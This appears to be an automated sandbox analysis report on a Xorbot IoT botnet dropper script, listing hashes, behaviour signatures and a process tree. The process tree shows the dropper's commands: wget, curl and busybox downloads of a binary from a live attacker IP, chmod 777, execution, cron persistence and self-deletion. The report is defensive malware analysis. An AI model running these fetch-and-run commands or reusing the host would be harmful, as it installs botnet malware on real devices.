Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    21-02-2025 02:46

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    908f28c4ebdeb696d86b93f4afb9cb73

  • SHA1

    3415ecd1724d4da877740685a580688f56330561

  • SHA256

    dca697bba35dd8ce268263754e049b79821084c2a0c64ed556c66902721e8619

  • SHA512

    c826bb3910c158b873f9683474c490e9d8b136294af8b3fce33d8ff09bc28ba936424c36614c02f5c067325029b0170c34183f118ed30ca9197f1f17897f2f63

  • SSDEEP

    96:WK/D/f/a/p/Z/uTW6SXA2hUPCNNSLDdowLGipNtsHrfzRzxz2znzjz6cIt9zzRzu:WGlTNtsHr75Zkz36cIv5Zkz3VNtsHrS

Malware Config

Signatures

  • Detects Xorbot 1 IoCs
  • Xorbot

    Xorbot is a linux botnet and trojan targeting IoT devices.

  • Xorbot family
  • Contacts a large (2053) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 1 IoCs
  • Renames itself 1 IoCs
  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 3 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
    • Executes dropped EXE
    PID:657
    • /bin/rm
      /bin/rm bins.sh
      2⤵
        PID:660
      • /usr/bin/wget
        wget http://37.44.238.88/bins/8OfMCv20jYYgZ4W2ktiuM3JBi9ig43NlJ5
        2⤵
        • Writes file to tmp directory
        PID:666
      • /usr/bin/curl
        curl -O http://37.44.238.88/bins/8OfMCv20jYYgZ4W2ktiuM3JBi9ig43NlJ5
        2⤵
        • Checks CPU configuration
        • Writes file to tmp directory
        PID:674
      • /bin/busybox
        /bin/busybox wget http://37.44.238.88/bins/8OfMCv20jYYgZ4W2ktiuM3JBi9ig43NlJ5
        2⤵
        • Writes file to tmp directory
        PID:683
      • /bin/chmod
        chmod 777 8OfMCv20jYYgZ4W2ktiuM3JBi9ig43NlJ5
        2⤵
        • File and Directory Permissions Modification
        PID:685
      • /tmp/8OfMCv20jYYgZ4W2ktiuM3JBi9ig43NlJ5
        ./8OfMCv20jYYgZ4W2ktiuM3JBi9ig43NlJ5
        2⤵
        • Renames itself
        • Reads runtime system information
        PID:687
        • /bin/sh
          sh -c "crontab -l"
          3⤵
            PID:689
            • /usr/bin/crontab
              crontab -l
              4⤵
              • Reads runtime system information
              PID:691
          • /bin/sh
            sh -c "crontab -"
            3⤵
              PID:693
              • /usr/bin/crontab
                crontab -
                4⤵
                • Creates/modifies Cron job
                PID:694
          • /bin/rm
            rm 8OfMCv20jYYgZ4W2ktiuM3JBi9ig43NlJ5
            2⤵
              PID:697
            • /usr/bin/wget
              wget http://37.44.238.88/bins/iwnOQoKO4P0UBdZG6qZhvNsD8Ue5TX1Ha8
              2⤵
                PID:734

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • /tmp/8OfMCv20jYYgZ4W2ktiuM3JBi9ig43NlJ5

              Filesize

              119KB

              MD5

              1b166b95f9cb4b079ef1b9ec8363ddf3

              SHA1

              0d8eb08add467b3b5474f9b25909297fe7c2839c

              SHA256

              94a19b33124cbbc1c570b3338f4dfbb2bf1a9335a72acf22be02a9bb8a323cc9

              SHA512

              983ae0f399df2a6cf1dd48ba09098964c5dcb55b8bd049bce8e9c2c15dd88336642da64908d93221247a64ce987950b05042b0fac8474b179f0b1f7f0aca6925

            • /var/spool/cron/crontabs/tmp.d0TPVA

              Filesize

              210B

              MD5

              d5d504aa86c8458d6e0709ff5824a098

              SHA1

              3c74a29d0180c1b982ab8c447973015c9411b39d

              SHA256

              8b9b339d29fe4af47d8840e2ab7d620b2d2d55ba9733be40d7ee40fbd5a4c10a

              SHA512

              a95521de0bca9a9543566606bde468db6041b31062cac4623e0f24474f54f5667fa8d20036c1196b88534badac5ed876e1cabd9d48903a93d273af6dcb595d72